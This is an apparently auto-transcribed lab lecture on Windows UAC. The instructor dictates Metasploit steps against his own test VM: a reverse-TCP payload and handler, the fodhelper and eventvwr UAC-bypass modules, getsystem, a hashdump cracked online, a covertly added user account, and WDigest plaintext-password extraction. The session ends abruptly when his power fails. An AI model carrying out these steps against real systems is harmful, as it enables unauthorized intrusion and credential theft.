user, John user, right? And high integrity is used by the administrator account. An administrator account by default in every window is by default disabled. And system reserved for the system use. So we have a filter tokens, and the filter token decide, right, to applies the separation of the rows. So you use administrators in a slightly different way during the logon. Non-administrators will receive a single access token when logging, which will be used for all tasks performed by the user. And this is called, this token has a medium integrity level. An administrator will receive two types of token, filter token and elevator token. A filter token with administrative privilege stripe used for regular operations. So this is also under the medium integrity level. An elevated token, which is used by elevated token with full administrative permissions, which are used when something needs to be run with administrative privileges. And this token has high integrity level. So in this way, administrator will use their filter token unless they explicitly request administrative privileges through the USC. So when you right click on the CMD and just right click and click on the open button or either run as administrator. So once you click on open, the CMD will open. Okay. Once you click on the run as administrator, your CMD will open. So this particular CMD is opened with the medium integrity level, which means he can perform only few tasks. And this CMD, which is allow the permission by the USC, so USC has allowed the permissions, so he can perform so many tasks, almost every task. So this CMD has high integrity level token. Okay, so if we analyze both process using the process hacker tool, we can see that the associated token and their difference. So this particular CMD is opened as a normal. That's why the permission is very few. And this CMD is opened by the high privileges. That's why the permission is more visible. Plus, in the mandatory label, you will see the medium mandatory label. Okay. And here, high mandatory label. So here the integrity is the high and the medium is here. Okay. So we have covered the theory. What is the USC? So without USC, you cannot perform the privileged task, right? So if I hack the victim computer, it doesn't mean I have a bypass the USC. USC is still activated, but I have to bypass this. So to bypassing the USC, we have some different methods. So there is some requirement actually. Okay, the connection has been broken because of I have changed the network settings. Okay. So this is my new IP address because my internet connection is creating problems for me. That's why I continuously changing my networks. So this is my okay. My Windows are also receiving the new uh, IP address, and Kalinix IP address is also changed actually. So that's why I have to also log in with a different IP address again. What is this? 1.4. What do you want to say? 1.4. Oh, I understand. Yeah. Right. Done. So the next task is that, okay, because I have changed my networks. So my IP address is changed. So again, I have to hack my Windows 10 one more time actually. Okay, no problem. So I have to generate. I have to create a virus again actually. So this is the code. This is the command actually. So let me delete all the previous viruses and delete from the Windows 10 also. Uh, where is it? Oh, sorry. Here is it. Payload2.exe and payload. Delete. So all the virus has been deleted. You can check the task manager also if any virus is running. So we can see that I don't think any virus is running. So in the task manager, we can see that there is no virus is running in the background. NSF Venom hyphen A 1.4 IP address 555 and rest of the things is same as it is. Okay. Payload2.exe I will try to generate and hit enter. Then now let's transfer this virus in the victim computer. So we can transfer from music folder, delete everything. Yes. Now to delete everything. So let's copy this payload.exe file inside of music folder. Okay, copy. Now just run the impact server. So just copy this virus and paste on the desktop. Then close, close. Now start the MSF console. So first I'm performing the, from the beginning, I'm performing the every command. Okay. From the starting, I'm performing the every step. I have created the virus. I have transferred the virus. Now I'm going to starting the handler for listening the connection. So use exploit multi handler. Okay. Now set payload. Payload name is, what is the payload name? Yeah. So this is the payload name. Just copy the payload name and paste here. Then set lhost 192.168.1.4. Set lport 5555. Done. Now check option command and everything is set. Right? Payload is set. IP address, port number, everything is set. Now just run the command exploit and done. running. Now let's go to the Windows victim computer and just open this virus. So virus is open. So when the virus is open, the connection I receive, right? So the first step is done because our the main task is that bypassing the UAC. So the bypassing the UAC is the bypassing the UAC is the requirement is that this is the main requirement that you must have a meterpreter normal shell. So yes, I have got this. As you can see, I have a meterpreter shell. Then now just background this cell, background this session command. So this session is in the background. Now to bypass the UAC, we have some bypassing UAC techniques. So one of them is a code helper registry key exploit. Code helper registry key exploit. So what is this? So firstly, we have to check what kind of permissions we have. So I have already told you get UID, get privileges command, right? So when we don't have a system and admin authority and privileges in the normal shell, right? In this shell, I don't have authorities. So here we need to bypass the UAC protection of targeted system. And this module will bypass Windows 10 the UAC by hijacking a special key in the registry under the current user hide and inserting a custom command that will get invoked when the Windows foodhelper.exe application is launched. It will spawn a second shell, which means it will give you the second shell, meterpreter shell that has the UAC flag turned off. And this module modify a registry key, but cleans up the key once the payload has been invoked. So this module does not require the architecture of the payload to match the operating system. So if I specify the exe custom your DLL should call exit process after the starting a payload. So we have a background of our sessions. After that, you have to use exploit. So use exploit Windows local and then bypass UAC and then code helper. Okay, now just hit enter. After the hit enter, when your exploit has been loaded, after loading the exploit, now that you can see that I have only one active session. ID number is 1. So now check the option command. In the option command, Windows meterpreter is already set, right? IP address, port number is already set. Only the session number is not set. Right? The session number is not set. So let's set the session 1. And the port number, you will see that the port number is 444. So we have to change because if you remember, I'm using the port number 555 in the payload, right? That's look at that. The port number I'm using 555. So that's why you have to change the port number also. So now everything is set. Session number set, IP address set, port number set. After that, you don't need to do anything. Just run the command exploit and just wait. And it will automatically bypass the UAC. You can see that. UAC is set to the default. Bypass UAC can bypass the settings and configuring the payload. And in the last, meterpreter session number 2 is we received. Okay, done. And now our meterpreter session is 2 is received, and this meterpreter session is not a normal shell. Right? This meterpreter shell is not a normal shell. It's an administrative shell. So first, so after getting the admin privilege, we can perform so many tasks. Okay. So I will perform the other tasks later. First, I will check. So check get privilege. So when I run, now you can see I have a lots of permissions. In the previous, you will see that I have only few permissions, 5 permissions, and these are the 5 permissions. You can see that. But now this time, when I run the get privilege, I have a lots of permission list. Next thing is when you run the get UID, you will receive a desktop computer name and the normal username, right? And then when you perform the get system, so after executing the get system command, your Meter shell will convert into admin shell, administrative shell. Okay. So when I run this command, and finally done. Now check again get UID, and this time your server username is different, which means now your MeterPeter is converted into administrative power. So now I have an administrative power, right? Now I can do so many things. So many things like one of them is hashdump command. I can execute now the hashdump command. So when I run the hashdump command, you can see that. Right? You can see that the user has is printed. Now copy this has, because this is the LM has and this is the NT has, NT LM has, and this is only LM has. So I just copy the LM has, copy this has, and just go to the website. Which website? If I remember, crack station.net. Crackstation.net, just copy and paste here the complete has, and then let's crack this has, and now crack the has. So this is the password of your Windows victim computer, right? So we have cracked the victim computer password also. Done. And except that, let's try to access the shell, the Windows command prompt shell. And in this Windows command prompt shell, if I try to run the whoami command, you will see anti-authority system is visible. Whoami? I am the anti-authority system, which means I am the administrator. Right? I am the administrator. Now, after becoming the administrator, I can perform so many tasks. Tasks like I can check the administrator user password. I can add new users. Okay, so let me check user, net user, and then net user administrator. Just copy the administrator username, paste, and then show me the random password of administrator user. So this is the random password for the administrator user by default password actually. And if you want to add a new user into this system, net user username is hacker. The password of the user is ASD/add. Command completed successfully, which means in the victim computer, I have also added a new user and the victim don't know about this, right? Victim don't know about this. And this is just a normal user adding. I have added a normal user. Right? I can perform some other tasks also, which is the advanced part, of course. Now let me exit. Okay. And let me exit one more time. So this MeterPeter session number 2 is closed. I have only now the session 1, which is normal user session. It's not an admin user session. But we need an admin user session every time when we perform another method, when we perform UAC bypassing. So this is the another method. First method is food helper registry key exploit, and we have successfully done this. Now another method is event viewer registry key. So by using this method also we can again bypass the UAC. Okay, so let's use, make sure, definitely make sure you have already the MeterPeter session 1. with the normal user, right? So let's perform this next method. So use exploit this command. Okay, this one. Use exploit Windows local and bypass UEC underscore event viewer. Done. So bypass event viewer is loaded. Check the option. In the option, the session number is not set. Check the sessions. Session 1 is available. So you have to just run the command set session 1 and set L4 4555. Now check again all the things. Session number is set, IP address set, port and port number is also set. And again, we have to run the same command exploit. Okay, one more thing. You can also run the command like run, right? Either you can use exploit command or either you can use a run command. Both commands will perform same. Run. So when I run the command, again, I have a bypass the UEC security. And the meter preter session 3 is open. Right? You can see that meter preter 3 is session open. Right? Check, get privilege, so many permissions, get UID, normal user. But when I perform the get system command, I receive I become the admin. Now run get UID again. Now you can see my username is changed. My server username is changed. Right? That's it. Okay, let me close this session and exit -1. So I have closed all the session, right? So now the victim computer is free. Right? So let me close this. Okay, the next thing is there is another type of attack. The attack is Windows 10 password in the plain text using the wdigest credential vulnerability. Okay, so with this vulnerability, the vulnerability name is wdigest credential caching vulnerability. This is the vulnerability name. So if this vulnerability is available in my system, then anyone can access, anyone can view my system password in plain text. Plain text like this. Password is equal to PHP. So this is the plain text. So hacker can easily see my Windows password in the plain text. No need to create my password, right? So now we are going to perform this task. And this is also very lengthy. So first of all, this particular vulnerability, wdigest credential vulnerability is not available in my Windows 10. This is the main concept. Okay. So this vulnerability is not available in my system, in my Windows 10. Then how can I perform this attack? So to perform this attack, first you have to enable this vulnerability in my system. If the problem is not available in my system, then create the problem and then practice. Simple, right? If the problem is not available, then if the weakness is not available, then create the weakness and then attack so that you can understand how the particular attack is working. So to enable this vulnerability, you have to just copy this command, complete command. I have to copy this complete command and just open the CMD as administrator. And after that, just copy and paste the complete command. Where is the command? Oh, copy paste is not working. Okay, copy from the PDF and paste inside the notepad. Copy from the notepad and paste inside this notepad, and copy from this notepad and paste inside on the CMD, right? And now just hit enter. Command operation completed successfully, which means now the wdigest credential vulnerability is enabled in this my system. But to perform the attack, I have to first restart my window, restart, so that the attack will work perfectly. Okay, done. So everything is fine. So I think the vulnerability is enabled in my system, the weakness is created. So let's perform the other task. Like first of all, we have to hack our Windows system again with the normal user, and then we will again bypass the UAC. Okay, so let's create a normal virus for the victim machine. MSF Venom -P, MSF Venom -P payload, reverse TCP, and port number, sorry, IP address is 1.4. Port number I can use 444, no doubt. Right, it's no problem. 444-F exe, and then -F exe architecture 86, and that's it. And payload name is payload.exe. Done. Right, payload is generated and created. The virus has been created. After creating the virus, simply just transfer the virus into the music folder and start the SMB server so that we can transfer this virus in the victim computer. Okay, now download this virus, select and paste on the desktop. This file might be a harmful. Okay, no problem. Close this and close this. Start the MSF console so that we can take a reverse shell of the victim computer. So we have transferred the normal virus. Okay, now we will, the first task is to start TCP handler, multi-handler. Use exploit multi-handler and check options. In the options, set payload, and the payload is this. Set I'll host 192.168.1.4. Port number is already set. You can see that port number is already set. So we don't need to set a port number. Now check again. And looks fine. Everything is correct. Now run the exploit command. And now go to the Windows machine and start this virus. Right click and open. Meta Session 1 open. Then after the MetaPressure session, now background this session and bypass the UAC. To bypass the UAC, uh, we will use this one, COM hijack. I don't think the COM hijack will work. No, I will not use the COM hijack actually. COM hijack maybe work, maybe not. But let's perform. Maybe it will work. So to bypass the UAC, I'm going to perform in the COM hijack. So use exploit Windows local bypass COM hijack option command. So option in the option command, everything is fine. I just need to set the session. So what is the session right now? Session ID number is 1. So set session 1. Done. Is there anything? Yeah, he's also saying that use the payload, but I have already my payload is already set. So I wanted to use only same as it is the payload. Let's perform this, the exploit, and let's see it will work. No, it is not working because of the 32 payload architecture selected for the 64-bit architecture. So it is saying the payload is 32-bit. Okay, so let's set the payload. Set payload Windows x64. Payload, in the payload, we don't have a 64-bit payload, right? Let me check. User share meta spark CD payloads, sorry, modules, CD payloads, TRW3. So in the tree format, in the Windows, we have a 64-bit, of course. x64. So yes, in our Windows, we have a x64 payload also, no doubt. Then let me use x64 and meter slash MEGR return reverse underscore TCP. Done. Now let's run again the same command. Okay, so again, this payload is not compatible, which means this idea is bad. So do not use this method because bypass COM hijack, I have a doubt already. So now the doubt is cleared. So we have to always use one of them. Either I will use the event viewer method and the food helper method. So you can use one of them, any method. So I wanted to use the event viewer actually. So to follow this process, use exploit Windows local bypass and event viewer options set session 1. Yeah, everything is rest of the things is set. Just run the exploit command and just wait. So this particular the exploit is working fine to bypass the UAC. Right, so UAC has been bypassed. Just run the command get system to access the administrator power. Done. And after this command, now you have to jump from this process, from this step to directly from this step, right? So you have to skip this particular part, right? Skip this complete part, right? So now he's saying that after getting the full privilege with repetition, so you can see that I have got the full privilege with repetition anti-authority system. Okay, then we will use the post, right? So let's background this session also. Check the session. So now I have a two types of session. First one is the normal user session, and second one is the anti-authority session, which is administrative power session. So let's use the post to exploit the W digest vulnerability so that we can see the victim user password in the plain text. So use post Windows manage W digest and caching. Yeah, W digest caching. Hit enter. After that, check the options. In the options, you don't need to set up anything, just set the session. So we have a session. How many sessions I have? I have a two sessions. So I have to set anti-authority system session in this post. So set session 2. Done. After the set the session, now run the command exploit. Done. Okay. And after that, now check again the session. Now log in inside session number 2. Are you listening?
Oh, sorry, Sanjay, you asked.
Are you listening?
I didn't get it, Sanjay.
Are you listening?
Yeah, yeah.
Okay. Okay. So the problem, there is one problem occurred. The problem is that the light has been gone to the heavy rain in my city,
Oh,
and so the Wi-Fi has been automatically turned off. And right now I'm connected with my mobile phone, and in my mobile also the network is not good. Plus the internet is also finished from my mobile, and you can see that my connection has been broken
mm-hmm.
of the attack. Whatever the steps we are following, the particular steps is also destroyed. So I have to follow again the same procedure one more time if the light has been come or not. So let's wait for 10 minutes and let's see if the light has been come or not. So you can consider as a rest, a break. Okay.
Okay.
Let's
Sanjay,
wait.
like,
Hmm.
as I said yesterday, like, I have to drop off in another 10 to 15 minutes.
Hmm.
Okay, I see like only Rahul is there in the call. Okay,
Fine.
so yeah, if your network is back, like you can continue with Rahul, or else
Okay.
like, yeah. the next week we can continue. Okay, it's up to you.
Oh, okay, no problem, no
Okay. Okay, Sanjay, I will drop
problem.
off. Okay. Yeah.
Okay,
Thanks.
thank
Thanks. Yeah. Bye.
you. Bye. Okay, hello, Rahul. Okay, so the light has been gone, so we will continue from the next weekend because I don't know when the light is come back. It is our bad luck, so I have only completed 2 hours only. And my attack for the process I have followed is also cancelled automatically because of the internet issues. Oh, sorry, the light issues. So my router is not, and I cannot connect continuously because of the I don't have internet also in my mobile phone and the battery backup issues also. Okay, so for today's that's enough for 2 hours. We have completed the lectures and let's continue and then we will meet the next weekend. Okay, Rahul?